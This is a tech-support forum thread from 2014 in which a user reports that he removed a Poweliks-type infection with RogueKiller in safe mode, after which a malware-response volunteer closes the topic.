as i am writing this i noticed another symptom of this infection, at least i think it might be, when that dll host thing starts up the browser im using umm(i dont know what its called) acts like there is something else that was clicked on, where the top of the browser that has the minimize/maximize/x thing greys out, like it would if you were to click on yahoo instant messenger or thunderbird or something, im typing all this in mozilla seamonkey if that helps(im trying to be as accurate as possible)



BC AdBot (Login to Remove)

 


#2 feralfreak

feralfreak
  • Topic Starter

  • Members
  • 38 posts
  • OFFLINE
  •  
  • Local time:08:15 PM

Posted 27 October 2014 - 03:20 AM

my problem might be fixed now, a buddy of mine at castlegrayskull told me i was doing the roguekiller scan wrong, said i had to go into safe mode(appearantly there are things that dont run in safe mode that this infection needs, and that gives a chance to kill it) and then run it, which i did, and then when it found it(powelik) i did what the page that popped up told me, stopped the dllhost things in task manager and then hit delete followed by an immediate reboot, its been about 10 minutes and no issues yet.

 

edit, some hours passed, no dll crap, moderators, i think its safe to close this if you wish.


Edited by feralfreak, 27 October 2014 - 07:33 AM.


#3 pystryker

pystryker

  • Malware Response Team
  • 730 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:15 PM

Posted 27 October 2014 - 02:36 PM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.

I close my topics if there is no response after 3 days. Please PM a moderator or myself to reopen your topic.

Please PM me only if I'm helping you with your computer issues and I have not responded in 2 days. Please remember, I'm a volunteer and sometimes life does get in the way. :)

Please stay with me until I declare your machine clean. Absence of symptoms does not ensure your machine is clean.

If you'd like to make a donation via Paypal, please click here.








0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users